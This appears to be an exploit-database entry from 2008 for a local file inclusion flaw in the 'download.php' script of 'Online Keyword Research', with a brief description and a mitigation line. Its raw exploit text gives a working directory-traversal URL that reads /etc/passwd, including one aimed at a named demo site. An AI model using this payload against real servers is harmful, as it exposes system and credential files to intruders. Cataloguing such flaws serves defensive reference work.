header-logo
Suggest Exploit
vendor:
Online Keyword Research
by:
Cold z3ro
7.5
CVSS
HIGH
Local File Include
22
CWE
Product Name: Online Keyword Research
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

Online Keyword Research (download.php filename) Local File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'filename' parameter to the 'download.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.
Source

Exploit-DB raw data:

Online Keyword Research (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=68900247
# demo   : http://www.rightscripts.com/keywordresearch/


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd


# Example

[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd



============================
Greetz : www.hackteach.org members , AnGeL25dZ

# milw0rm.com [2008-12-19]

Navigation

Suggest Exploit

Services By CQR